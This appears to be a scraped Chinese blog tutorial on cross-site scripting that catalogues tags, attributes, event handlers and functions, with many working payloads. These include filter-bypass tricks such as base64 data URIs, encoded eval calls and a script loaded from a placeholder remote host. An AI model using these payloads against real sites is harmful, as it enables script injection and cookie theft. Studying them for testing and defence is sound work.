• XSS详解


    XXS短标签、属性、事件、方法

    短标签

    自带HtmlEncode(转义)功能的标签(RCDATA),这是插入的javascript不会被执行,除非我们闭合掉它们。

    
    
    
    
     
     
    </plaintext> 
    其他:<math></math>也不行
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li></ul></pre> 
    <p>一些常见的短标签<br> 以下的短标签可以<a href="https://so.csdn.net/so/search?q=%E6%89%A7%E8%A1%8CJavaScript&spm=1001.2101.3001.7020" target="_blank" class="hl hl-1" data-report-view="{"spm":"1001.2101.3001.7020","dest":"https://so.csdn.net/so/search?q=%E6%89%A7%E8%A1%8CJavaScript&spm=1001.2101.3001.7020","extra":"{\"searchword\":\"执行JavaScript\"}"}" data-report-click="{"spm":"1001.2101.3001.7020","dest":"https://so.csdn.net/so/search?q=%E6%89%A7%E8%A1%8CJavaScript&spm=1001.2101.3001.7020","extra":"{\"searchword\":\"执行JavaScript\"}"}" data-tit="执行JavaScript" data-pretit="执行javascript">执行JavaScript</a></p> 
    <pre data-index="1" class="set-code-hide prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a> 
    <p> 
    <img>
    <body> 
    <button>
    <script>
    <var>
    <div> 
    <object> 
    <input> 
    <select> 
    <keygen> 
    <frameset>  
    <embed>
    <svg> 
    <video> 
    <audio>
    <iframe> 
    <textarea> 
    <math> 
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><div class="hide-preCode-box"><span class="hide-preCode-bt" data-report-view="{"spm":"1001.2101.3001.7365"}"><img class="look-more-preCode contentImg-no-view" src="https://1000bd.com/contentImg/2022/06/27/191644837.png" alt="" title=""></span></div><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li><li style="color: rgb(153, 153, 153);">10</li><li style="color: rgb(153, 153, 153);">11</li><li style="color: rgb(153, 153, 153);">12</li><li style="color: rgb(153, 153, 153);">13</li><li style="color: rgb(153, 153, 153);">14</li><li style="color: rgb(153, 153, 153);">15</li><li style="color: rgb(153, 153, 153);">16</li><li style="color: rgb(153, 153, 153);">17</li><li style="color: rgb(153, 153, 153);">18</li><li style="color: rgb(153, 153, 153);">19</li><li style="color: rgb(153, 153, 153);">20</li></ul></pre> 
    <p><a></p> 
    <pre data-index="2" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a href="javascript:alert(1)">test</a>
    <a href="x" onfocus="alert('xss');" autofocus="">xss</a>
    <a href="x" onclick=eval("alert('xss');")>xss</a>
    <a href="x" onmouseover="alert('xss');">xss</a>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre> 
    <p><img></p> 
    <pre data-index="3" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src=x onerror="alert(1)">
    <img src=x onerror=eval("alert(1)")>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <p><<a href="https://so.csdn.net/so/search?q=iframe&spm=1001.2101.3001.7020" target="_blank" class="hl hl-1" data-report-view="{"spm":"1001.2101.3001.7020","dest":"https://so.csdn.net/so/search?q=iframe&spm=1001.2101.3001.7020","extra":"{\"searchword\":\"iframe\"}"}" data-report-click="{"spm":"1001.2101.3001.7020","dest":"https://so.csdn.net/so/search?q=iframe&spm=1001.2101.3001.7020","extra":"{\"searchword\":\"iframe\"}"}" data-tit="iframe" data-pretit="iframe">iframe</a>></p> 
    <pre data-index="4" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><iframe src="javascript:alert(1)">test</iframe>
    <iframe onload="alert(document.cookie)"></iframe>
    <iframe onload="alert('xss');"></iframe>
    <iframe onload="base64,YWxlcnQoJ3hzcycpOw=="></iframe>
    <iframe onmouseover="alert('xss');"></iframe>
    <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li></ul></pre> 
    <p><audio></p> 
    <pre data-index="5" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><audio src=1 onerror=alert(1)>
    <audio><source src="x" onerror="alert('xss');"></audio>
    <audio controls onfocus=eval("alert('xss');") autofocus=""></audio>
    <audio controls onmouseover="alert('xss');"><source src="x"></audio>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre> 
    <p><video></p> 
    <pre data-index="6" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><video src=x onerror=alert(1)>
    <video><source onerror="alert('xss');"></video>
    <video controls onmouseover="alert('xss');"></video>
    <video controls onfocus="alert('xss');" autofocus=""></video>
    <video controls onclick="alert('xss');"></video>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li></ul></pre> 
    <p><<a href="https://so.csdn.net/so/search?q=svg&spm=1001.2101.3001.7020" target="_blank" class="hl hl-1" data-report-view="{"spm":"1001.2101.3001.7020","dest":"https://so.csdn.net/so/search?q=svg&spm=1001.2101.3001.7020","extra":"{\"searchword\":\"svg\"}"}" data-report-click="{"spm":"1001.2101.3001.7020","dest":"https://so.csdn.net/so/search?q=svg&spm=1001.2101.3001.7020","extra":"{\"searchword\":\"svg\"}"}" data-tit="svg" data-pretit="svg">svg</a>></p> 
    <pre data-index="7" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><svg onload=javascript:alert(1)>
    <svg onload="alert('xss');"></svg>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <p><button></p> 
    <pre data-index="8" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><button onclick=alert(1)>
    <button onfocus="alert('xss');" autofocus="">xss</button>
    <button onclick="alert('xss');">xss</button>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li></ul></pre> 
    <p><div></p> 
    <pre data-index="9" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">原代码:
    <div onmouseover='alert(1)'>DIV</div>
    经过url编码:
    <div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre> 
    <p><object></p> 
    <pre data-index="10" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p><script></p> 
    <pre data-index="11" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><script>alert('xss')</script>
    <script>alert(/xss/)</script>
    <script>alert(123)</script>
    <script src=http://xxx.xxx/a.js></script>
    <script src=//xxx.xxx/a.js></script>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li></ul></pre> 
    <p><input></p> 
    <pre data-index="12" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><input onfocus="alert('xss');" autofocus="">
    <input onmouseover="alert('xss');">
    <input type="text" onkeydown="alert('xss');"></input>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li></ul></pre> 
    <p><form></p> 
    <pre data-index="13" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><form method="x" action="x" onmouseover="alert('xss');"><input type=submit></form>
    <form method="x" action="x" onmouseout="alert('xss');"><input type=submit></form>
    <form method="x" action="x" onmouseup="alert('xss');"><input type=submit></form>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li></ul></pre> 
    <p>综合上面短标签的使用,除了特殊的几个,其他的使用都差不多,都是配合属性或者事件使用</p> 
    <h3><a name="t3"></a><a id="_126"></a>属性</h3> 
    <pre data-index="14" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">data=
    href=
    action=
    formaction=
    location=
    on*=
    name=
    background=
    poster=
    src=
    code=
    xlink:href=
    autofocus=
    content=
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li><li style="color: rgb(153, 153, 153);">10</li><li style="color: rgb(153, 153, 153);">11</li><li style="color: rgb(153, 153, 153);">12</li><li style="color: rgb(153, 153, 153);">13</li><li style="color: rgb(153, 153, 153);">14</li></ul></pre> 
    <p>这里只介绍一个data协议,他可以使用Data URI绕过,但并不是所有短标签都可以使用</p> 
    <pre data-index="15" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">* data:,文本数据
    * data:text/plain,文本数据
    * data:text/html,HTML代码
    * data:text/css;base64,css代码
    * data:text/javascript;base64,javascript代码
    * data:image/x-icon;base64,base64编码的icon图片数据
    * data:image/gif;base64,base64编码的gif图片数据
    * data:image/png;base64,base64编码的png图片数据
    * data:image/jpeg;base64,base64编码的jpeg图片数据
    
    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
    <object data="data:text/html;base64 ,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
    <iframe src="data:text/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></iframe>
    <embed src="data:text/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></embed>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li><li style="color: rgb(153, 153, 153);">10</li><li style="color: rgb(153, 153, 153);">11</li><li style="color: rgb(153, 153, 153);">12</li><li style="color: rgb(153, 153, 153);">13</li><li style="color: rgb(153, 153, 153);">14</li></ul></pre> 
    <p>src/href/action/xlink:href/autofocus/content/data 等属性直接使用伪协议绕过。如javascript 伪协议: <a href=javascript:alert(2)>test</a><br> 不使用 href 的另外一种组合来执行 js:<svg><a xlink:href=“javascript:alert(14)”> 
     <rect width="1000" height="1000" fill="white">
       </a></svg>(均可) 或者: <math><a xlink:href=javascript:alert(1)>1</a></math>(Chrome不可,Firefox可以) 
     </rect></p> 
    <h3><a name="t4"></a><a id="_164"></a>事件</h3> 
    <p>所有的event都是可以执行js的,on*事件中插入合乎逻辑的JS代码即可<br> 常见事件</p> 
    <pre data-index="16" class="set-code-hide prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">FSCommand() (当从嵌入式 Flash 对象中执行时,攻击者可以使用它)
    onAbort() (当用户中止图像加载时)
    onActivate() (当对象被设置为活动元素时)
    onAfterPrint() (在用户打印或预览打印作业后激活)
    onAfterUpdate() (更新源对象中的数据后在数据对象上激活)
    onBeforeActivate() (在对象被设置为活动元素之前触发)
    onBeforeCopy()(攻击者在将选择复制到剪贴板之前执行攻击字符串 – 攻击者可以使用该execCommand("Copy")功能执行此操作)
    onBeforeCut() (攻击者在选择被切断之前执行攻击字符串)
    onBeforeDeactivate() (在 activeElement 从当前对象更改后立即触发)
    onBeforeEditFocus() (在可编辑元素中包含的对象进入 UI 激活状态之前或在选择可编辑容器对象时触发)
    onBeforePaste()(用户需要被诱骗粘贴或使用该execCommand("Paste")功能强制粘贴)
    onBeforePrint()(用户需要被欺骗打印或攻击者可以使用print()或execCommand("Print")功能)。
    onBeforeUnload() (用户需要被诱骗关闭浏览器 – 除非它是从父级生成的,否则攻击者无法卸载窗口)
    onBeforeUpdate() (在更新源对象中的数据之前激活数据对象)
    onBegin() (当元素的时间线开始时, onbegin 事件会立即触发)
    onBlur() (在加载另一个弹出窗口并且窗口失去焦点的情况下)
    onBounce() (当Marquee对象的行为属性设置为“备用”和Marquee的内容到达窗口的一侧时)
    onCellChange() (当数据提供者中的数据发生变化时触发)
    onChange() (选择、文本或 TEXTAREA 字段失去焦点并且其值已被修改)
    onClick() (有人点击表格)
    onContextMenu() (用户需要右键单击攻击区域)
    onControlSelect() (当用户即将对对象进行控件选择时触发)
    onCopy()(用户需要复制一些东西或者可以使用execCommand("Copy")命令来利用它)
    onCut()(用户需要复制一些东西或者可以使用execCommand("Cut")命令来利用它)
    onDataAvailable() (用户需要更改元素中的数据,否则攻击者可以执行相同的功能)
    onDataSetChanged() (当数据源对象公开的数据集更改时触发)
    onDataSetComplete() (触发以指示数据源对象中的所有数据都可用)
    onDblClick() (用户双击表单元素或链接)
    onDeactivate() (当 activeElement 从当前对象更改为父文档中的另一个对象时触发)
    onDrag() (要求用户拖动对象)
    onDragEnd() (要求用户拖动对象)
    onDragLeave() (要求用户将对象拖离有效位置)
    onDragEnter() (要求用户将对象拖动到有效位置)
    onDragOver() (要求用户将对象拖动到有效位置)
    onDragDrop() (用户将对象(例如文件)拖放到浏览器窗口上)
    onDragStart() (在用户开始拖动操作时发生)
    onDrop() (用户将对象(例如文件)拖放到浏览器窗口上)
    onEnd() (当时间线结束时触发 onEnd 事件。
    onError() (加载文档或图像会导致错误)
    onErrorUpdate() (在更新数据源对象中的关联数据时发生错误时触发数据绑定对象)
    onFilterChange() (当视觉过滤器完成状态更改时触发)
    onFinish() (攻击者可以在选框完成循环时创建利用)
    onFocus() (攻击者在窗口获得焦点时执行攻击字符串)
    onFocusIn() (攻击者在窗口获得焦点时执行攻击字符串)
    onFocusOut() (攻击者在窗口失去焦点时执行攻击字符串)
    onHashChange() (当文档当前地址的片段标识符部分更改时触发)
    onHelp() (攻击者在窗口处于焦点时用户点击 F1 时执行攻击字符串)
    onInput() (元素的文本内容通过用户界面更改)
    onKeyDown() (用户按下一个键)
    onKeyPress() (用户按下或按住某个键)
    onKeyUp() (用户释放密钥)
    onLayoutComplete() (用户必须打印或打印预览)
    onLoad() (攻击者在窗口加载后执行攻击字符串)
    onLoseCapture()(可以被releaseCapture()方法利用)
    onMediaComplete() (当使用流媒体文件时,此事件可能会在文件开始播放之前触发)
    onMediaError() (用户在浏览器中打开一个包含媒体文件的页面,出现问题时触发该事件)
    onMessage() (当文档收到消息时触发)
    onMouseDown() (攻击者需要让用户点击图片)
    onMouseEnter() (光标在对象或区域上移动)
    onMouseLeave() (攻击者需要让用户将鼠标悬停在图像或表格上,然后再次关闭)
    onMouseMove() (攻击者需要让用户将鼠标悬停在图像或表格上)
    onMouseOut() (攻击者需要让用户将鼠标悬停在图像或表格上,然后再次关闭)
    onMouseOver() (光标在对象或区域上移动)
    onMouseUp() (攻击者需要让用户点击图片)
    onMouseWheel() (攻击者需要让用户使用他们的鼠标滚轮)
    onMove() (用户或攻击者会移动页面)
    onMoveEnd() (用户或攻击者会移动页面)
    onMoveStart() (用户或攻击者会移动页面)
    onOffline() (发生在浏览器在联机模式下工作并且开始脱机工作时)
    onOnline() (发生在浏览器在离线模式下工作并开始在线工作时)
    onOutOfSync() (中断元素播放时间轴定义的媒体的能力)
    onPaste()(用户需要粘贴或攻击者可以使用该execCommand("Paste")功能)
    onPause() (当时间线暂停时,onpause 事件会在每个处于活动状态的元素上触发,包括 body 元素)
    onPopState() (当用户浏览会话历史时触发)
    onProgress() (攻击者会在加载 Flash 电影时使用它)
    onPropertyChange() (用户或攻击者需要更改元素属性)
    onReadyStateChange() (用户或攻击者需要更改元素属性)
    onRedo() (用户在撤消交易历史中前进)
    onRepeat() (该事件为时间线的每次重复触发一次,不包括第一个完整周期)
    onReset() (用户或攻击者重置表单)
    onResize()(用户将调整窗口的大小,攻击者就可以自动与像初始化:<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
    onResizeEnd()(用户将调整窗口的大小,攻击者就可以自动与像初始化:<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
    onResizeStart()(用户将调整窗口的大小,攻击者就可以自动与像初始化:<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
    onResume() (onresume 事件会在时间线恢复时激活的每个元素上触发,包括 body 元素)
    onReverse() (如果元素的 repeatCount 大于 1,则每次时间线开始向后播放时都会触发此事件)
    onRowsEnter() (用户或攻击者需要更改数据源中的一行)
    onRowExit() (用户或攻击者需要更改数据源中的一行)
    onRowDelete() (用户或攻击者需要删除数据源中的一行)
    onRowInserted() (用户或攻击者需要在数据源中插入一行)
    onScroll()(用户需要滚动,否则攻击者可以使用该scrollBy()功能)
    onSeek() (当时间轴设置为向前以外的任何方向播放时,将触发 onreverse 事件)
    onSelect()(用户需要选择一些文本-攻击者可以自动初始化是这样的:window.document.execCommand("SelectAll");)
    onSelectionChange()(用户需要选择一些文本-攻击者可以自动初始化是这样的:window.document.execCommand("SelectAll");)
    onSelectStart()(用户需要选择一些文本-攻击者可以自动初始化是这样的:window.document.execCommand("SelectAll");)
    onStart() (在每个选框循环开始时触发)
    onStop() (用户需要按停止按钮或离开网页)
    onStorage() (存储区域已更改)
    onSyncRestored() (用户中断元素播放由时间线定义的媒体的能力以触发)
    onSubmit() (需要攻击者或用户提交表单)
    onTimeError() (用户或攻击者将时间属性(例如 dur)设置为无效值)
    onTrackChange() (用户或攻击者更改播放列表中的曲目)
    onUndo() (用户在撤消事务历史记录中倒退)
    onUnload() (当用户单击任何链接或按下后退按钮或攻击者强制单击时)
    onURLFlip() (当由 HTML+TIME(定时交互式多媒体扩展)媒体标签播放的高级流格式 (ASF) 文件处理嵌入在 ASF 文件中的脚本命令时,将触发此事件)
    seekSegmentTime() (这是一种在元素的片段时间线上定位指定点并从该点开始播放的方法。片段由时间线的一次重复组成,包括使用 AUTOREVERSE 属性的反向播放。)
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><div class="hide-preCode-box"><span class="hide-preCode-bt" data-report-view="{"spm":"1001.2101.3001.7365"}"><img class="look-more-preCode contentImg-no-view" src="https://1000bd.com/contentImg/2022/06/27/191644837.png" alt="" title=""></span></div><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li><li style="color: rgb(153, 153, 153);">10</li><li style="color: rgb(153, 153, 153);">11</li><li style="color: rgb(153, 153, 153);">12</li><li style="color: rgb(153, 153, 153);">13</li><li style="color: rgb(153, 153, 153);">14</li><li style="color: rgb(153, 153, 153);">15</li><li style="color: rgb(153, 153, 153);">16</li><li style="color: rgb(153, 153, 153);">17</li><li style="color: rgb(153, 153, 153);">18</li><li style="color: rgb(153, 153, 153);">19</li><li style="color: rgb(153, 153, 153);">20</li><li style="color: rgb(153, 153, 153);">21</li><li style="color: rgb(153, 153, 153);">22</li><li style="color: rgb(153, 153, 153);">23</li><li style="color: rgb(153, 153, 153);">24</li><li style="color: rgb(153, 153, 153);">25</li><li style="color: rgb(153, 153, 153);">26</li><li style="color: rgb(153, 153, 153);">27</li><li style="color: rgb(153, 153, 153);">28</li><li style="color: rgb(153, 153, 153);">29</li><li style="color: rgb(153, 153, 153);">30</li><li style="color: rgb(153, 153, 153);">31</li><li style="color: rgb(153, 153, 153);">32</li><li style="color: rgb(153, 153, 153);">33</li><li style="color: rgb(153, 153, 153);">34</li><li style="color: rgb(153, 153, 153);">35</li><li style="color: rgb(153, 153, 153);">36</li><li style="color: rgb(153, 153, 153);">37</li><li style="color: rgb(153, 153, 153);">38</li><li style="color: rgb(153, 153, 153);">39</li><li style="color: rgb(153, 153, 153);">40</li><li style="color: rgb(153, 153, 153);">41</li><li style="color: rgb(153, 153, 153);">42</li><li style="color: rgb(153, 153, 153);">43</li><li style="color: rgb(153, 153, 153);">44</li><li style="color: rgb(153, 153, 153);">45</li><li style="color: rgb(153, 153, 153);">46</li><li style="color: rgb(153, 153, 153);">47</li><li style="color: rgb(153, 153, 153);">48</li><li style="color: rgb(153, 153, 153);">49</li><li style="color: rgb(153, 153, 153);">50</li><li style="color: rgb(153, 153, 153);">51</li><li style="color: rgb(153, 153, 153);">52</li><li style="color: rgb(153, 153, 153);">53</li><li style="color: rgb(153, 153, 153);">54</li><li style="color: rgb(153, 153, 153);">55</li><li style="color: rgb(153, 153, 153);">56</li><li style="color: rgb(153, 153, 153);">57</li><li style="color: rgb(153, 153, 153);">58</li><li style="color: rgb(153, 153, 153);">59</li><li style="color: rgb(153, 153, 153);">60</li><li style="color: rgb(153, 153, 153);">61</li><li style="color: rgb(153, 153, 153);">62</li><li style="color: rgb(153, 153, 153);">63</li><li style="color: rgb(153, 153, 153);">64</li><li style="color: rgb(153, 153, 153);">65</li><li style="color: rgb(153, 153, 153);">66</li><li style="color: rgb(153, 153, 153);">67</li><li style="color: rgb(153, 153, 153);">68</li><li style="color: rgb(153, 153, 153);">69</li><li style="color: rgb(153, 153, 153);">70</li><li style="color: rgb(153, 153, 153);">71</li><li style="color: rgb(153, 153, 153);">72</li><li style="color: rgb(153, 153, 153);">73</li><li style="color: rgb(153, 153, 153);">74</li><li style="color: rgb(153, 153, 153);">75</li><li style="color: rgb(153, 153, 153);">76</li><li style="color: rgb(153, 153, 153);">77</li><li style="color: rgb(153, 153, 153);">78</li><li style="color: rgb(153, 153, 153);">79</li><li style="color: rgb(153, 153, 153);">80</li><li style="color: rgb(153, 153, 153);">81</li><li style="color: rgb(153, 153, 153);">82</li><li style="color: rgb(153, 153, 153);">83</li><li style="color: rgb(153, 153, 153);">84</li><li style="color: rgb(153, 153, 153);">85</li><li style="color: rgb(153, 153, 153);">86</li><li style="color: rgb(153, 153, 153);">87</li><li style="color: rgb(153, 153, 153);">88</li><li style="color: rgb(153, 153, 153);">89</li><li style="color: rgb(153, 153, 153);">90</li><li style="color: rgb(153, 153, 153);">91</li><li style="color: rgb(153, 153, 153);">92</li><li style="color: rgb(153, 153, 153);">93</li><li style="color: rgb(153, 153, 153);">94</li><li style="color: rgb(153, 153, 153);">95</li><li style="color: rgb(153, 153, 153);">96</li><li style="color: rgb(153, 153, 153);">97</li><li style="color: rgb(153, 153, 153);">98</li><li style="color: rgb(153, 153, 153);">99</li><li style="color: rgb(153, 153, 153);">100</li><li style="color: rgb(153, 153, 153);">101</li><li style="color: rgb(153, 153, 153);">102</li><li style="color: rgb(153, 153, 153);">103</li><li style="color: rgb(153, 153, 153);">104</li><li style="color: rgb(153, 153, 153);">105</li></ul></pre> 
    <h3><a name="t5"></a><a id="_274"></a>函数</h3> 
    <h4><a name="t6"></a><a id="_275"></a>弹窗函数</h4> 
    <pre data-index="17" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">alert
    confirm
    prompt
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li></ul></pre> 
    <h4><a name="t7"></a><a id="_281"></a>一些对于绕过有用的函数</h4> 
    <pre data-index="18" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">eval
    top
    window
    self
    parent
    frames
    setTimeout
    atob
    setInterval
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li></ul></pre> 
    <p><strong>eval</strong></p> 
    <pre data-index="19" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src="x"onerror="eval('al'+'ert(1)')">
    <script>eval("\x61\x6C\x65\x72\x74\x28\x31\x29")</script>
    <script>eval("\141\154\145\162\164\050\061\051")</script>
    <script>eval("\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029")</script>
    <a href=javascript:eval(atob('YWxlcnQoMSk='))>test</a>
    <a href=javascript:eval(window.atob('YWxlcnQoMSk='))>test</a>
    <a href=javascript:eval(window['atob']('YWxlcnQoMSk='))>test</a>
    <img src=x onmouseover="eval(window.atob('YWxlcnQoMSk='))">
    <img src=x onerror="eval(atob('YWxlcnQoMSk='))">
    <iframe src="javascript:eval(window['atob']('YWxlcnQoMSk='))"></iframe>
    <a href='javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))'>test</a>
